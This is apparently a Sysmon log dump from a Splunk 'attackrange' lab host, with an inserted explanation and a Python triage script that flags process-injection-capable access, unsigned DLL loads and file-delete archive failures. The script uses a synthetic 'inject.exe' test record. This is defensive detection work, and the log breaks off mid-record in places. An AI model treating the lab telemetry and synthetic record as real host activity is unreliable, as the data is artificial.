Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 
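The records above and below are Sysmon events from the Microsoft-Windows-Sysmon/Operational channel with their XML tags stripped, so each one reads as the System fields (EventID, Version, Level, Task, Opcode, Keywords, EventRecordID, Channel, Computer, RuleName) followed by the EventData fields in schema order: Event 7 image loads with Signed/Signature/SignatureStatus, Event 10 ProcessAccess with GrantedAccess and CallTrace, Event 17/18 pipe events, Event 1 process creation, Event 11 file creation and Event 23 file deletion. Two things in this stream deserve a check rather than a glance: the Event 23 records on win-host-5 carry Archived = "false - insufficient disk space", meaning Sysmon is not retaining the deleted files it is configured to archive on that host, and the Event 10 records with GrantedAccess 0x1fffff (PROCESS_ALL_ACCESS) come from splunkd.exe opening its own child, from conhost.exe and from csrss.exe, which is expected noise that a process-access rule must suppress without suppressing the same mask from an unexpected source. The following Python is an added example, not code from the page, from Splunk or from Sysinternals: it parses events in the XML shape Sysmon writes to the event log, decodes GrantedAccess into named rights, and applies three triage rules. The sample events are constructed to mirror records on this page (GUIDs and paths copied from it); the final "inject.exe" record is synthetic test input so the process-access rule has something to fire on, and the allowlist and rule thresholds are this example's assumptions, not Sysmon defaults.

```python
"""Sysmon triage rules over constructed sample events (added example; not
Splunk, Sysinternals or page code). Sample events mirror records on this
page; the inject.exe record is synthetic test input."""
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# PROCESS_* and standard rights from winnt.h, used to decode Event 10 GrantedAccess.
ACCESS_BITS = {
    0x1: "TERMINATE", 0x2: "CREATE_THREAD", 0x4: "SET_SESSIONID", 0x8: "VM_OPERATION",
    0x10: "VM_READ", 0x20: "VM_WRITE", 0x40: "DUP_HANDLE", 0x80: "CREATE_PROCESS",
    0x100: "SET_QUOTA", 0x200: "SET_INFORMATION", 0x400: "QUERY_INFORMATION",
    0x800: "SUSPEND_RESUME", 0x1000: "QUERY_LIMITED_INFORMATION",
    0x2000: "SET_LIMITED_INFORMATION", 0x10000: "DELETE", 0x20000: "READ_CONTROL",
    0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE",
}
TAMPER = 0x2 | 0x8 | 0x20  # CREATE_THREAD | VM_OPERATION | VM_WRITE: enough to inject code
# Assumption: subsystem components that legitimately open every process with full access.
FULL_ACCESS_ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\conhost.exe"}

ROOT = r"C:\Program Files\SplunkUniversalForwarder"
BIN = ROOT + r"\bin"
NETMON_GUID = "{21761711-7A4B-6080-BD60-00000000BB01}"
SPLUNKD_GUID = "{21761711-842A-607D-9700-00000000BB01}"


def sysmon_xml(event_id, record_id, **data):
    """Render one event in the XML layout Sysmon writes to the event log."""
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS[1:-1]}"><System><EventID>{event_id}</EventID>'
            f"<EventRecordID>{record_id}</EventRecordID>"
            f"<Computer>win-host-5.attackrange.local</Computer></System>"
            f"<EventData>{body}</EventData></Event>")


SAMPLE_EVENTS = [  # constructed from records on this page
    sysmon_xml(1, 1605672, Image=f"{BIN}\\splunk-netmon.exe", ProcessGuid=NETMON_GUID,
               ParentImage=f"{BIN}\\splunkd.exe", ParentProcessGuid=SPLUNKD_GUID),
    sysmon_xml(10, 1605673, SourceImage=f"{BIN}\\splunkd.exe", SourceProcessGUID=SPLUNKD_GUID,
               TargetImage=f"{BIN}\\splunk-netmon.exe", TargetProcessGUID=NETMON_GUID,
               GrantedAccess="0x1fffff"),
    sysmon_xml(10, 1605679, SourceImage=r"C:\Windows\system32\conhost.exe",
               SourceProcessGUID="{21761711-842B-607D-9B00-00000000BB01}",
               TargetImage=f"{BIN}\\splunk-netmon.exe", TargetProcessGUID=NETMON_GUID,
               GrantedAccess="0x1fffff"),
    sysmon_xml(7, 1605699, Image=f"{BIN}\\splunk-netmon.exe", ImageLoaded=f"{BIN}\\libeay32.dll",
               Signed="true", Signature="Splunk, Inc.", SignatureStatus="Valid"),
    sysmon_xml(23, 1605722, Image=f"{BIN}\\splunk-winevtlog.exe",
               TargetFilename=ROOT + r"\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational",
               Archived="false - insufficient disk space"),
    # synthetic test input: a non-parent, non-allowlisted source opening splunkd.exe with full access
    sysmon_xml(10, 9999999, SourceImage=r"C:\Users\Public\inject.exe",
               SourceProcessGUID="{00000000-0000-0000-0000-000000000000}",
               TargetImage=f"{BIN}\\splunkd.exe", TargetProcessGUID=SPLUNKD_GUID,
               GrantedAccess="0x1fffff"),
]


def parse(xml_text):
    """Flatten one Sysmon event into a dict of System ids plus every EventData field."""
    root = ET.fromstring(xml_text)
    ev = {"EventID": int(root.findtext(f"{NS}System/{NS}EventID")),
          "EventRecordID": int(root.findtext(f"{NS}System/{NS}EventRecordID"))}
    for d in root.iterfind(f"{NS}EventData/{NS}Data"):
        ev[d.get("Name")] = d.text or ""
    return ev


def decode_access(mask_hex):
    """Expand a GrantedAccess mask into right names; undefined bits are kept as hex."""
    mask = int(mask_hex, 16)
    names = [name for bit, name in ACCESS_BITS.items() if mask & bit]
    rest = mask & ~sum(ACCESS_BITS)
    return names + ([f"0x{rest:x}"] if rest else [])


def triage(xml_events):
    """Return (EventRecordID, rule, detail) findings for the three rules described above."""
    events = [parse(x) for x in xml_events]
    parent_of = {e["ProcessGuid"]: e["ParentProcessGuid"] for e in events if e["EventID"] == 1}
    findings = []
    for e in events:
        if e["EventID"] == 10:
            mask = int(e["GrantedAccess"], 16)
            benign = (e["SourceImage"].lower() in FULL_ACCESS_ALLOWLIST
                      or parent_of.get(e["TargetProcessGUID"]) == e["SourceProcessGUID"])
            if mask & TAMPER and not benign:
                findings.append((e["EventRecordID"], "process_access_tamper",
                                 f"{e['SourceImage']} -> {e['TargetImage']} {decode_access(e['GrantedAccess'])}"))
        elif e["EventID"] == 7 and (e["Signed"] != "true" or e["SignatureStatus"] != "Valid"):
            findings.append((e["EventRecordID"], "unsigned_image_load",
                             f"{e['Image']} loaded {e['ImageLoaded']}"))
        elif e["EventID"] == 23 and not e["Archived"].startswith("true"):
            findings.append((e["EventRecordID"], "filedelete_archive_failed",
                             f"{e['TargetFilename']}: {e['Archived']}"))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(*finding)
```

Run against real data, feed `triage` the strings returned by `Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational` piped through `.ToXml()`; the parent correlation only works if the Event 1 for the target process is in the same batch, so for long-running targets keep a persistent ProcessGuid map rather than rebuilding it per batch. On this page's own records the rule set yields one finding, the Event 23 archive failure on win-host-5; the 0x1fffff opens by splunkd.exe, conhost.exe and csrss.exe are suppressed by the parent check and the allowlist, and decoding 0x3600 and 0x101400 shows the svchost.exe and splunk-regmon.exe opens carry only query/set-information and synchronize rights, not the rights needed to write memory.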
10341000x80000000000000001605679Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.049{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605678Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.049{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001605677Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.049{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001605676Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.048{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001605675Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.048{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3trueSplunk, Inc.Valid 10341000x80000000000000001605674Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.032{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001605673Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001605672Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.032{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001605671Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605670Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605669Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 
17141700x80000000000000001605668Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605667Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605666Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.032{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001605848Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.720{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605847Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.720{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C950D4180271E499240E1F19FEBE4905,SHA256=B24B1C9317F40AEC4F26705E20A75CC0C92959FE22D286224DA01BDDA9F4A09Ffalsefalse - insufficient disk space 534500x80000000000000001605846Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.557{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001605845Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.557{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001605844Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.557{21761711-7A4C-6080-BF60-00000000BB01}33166908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605843Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.555{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605842Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.554{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001605937Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001605936Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001605935Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001605934Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program 
Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001605933Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001605932Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001605931Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001605930Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001605929Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001605928Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001605927Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 
734700x80000000000000001605926Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001605925Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001605924Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001605923Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001605922Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001605921Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001605920Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001605919Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client 
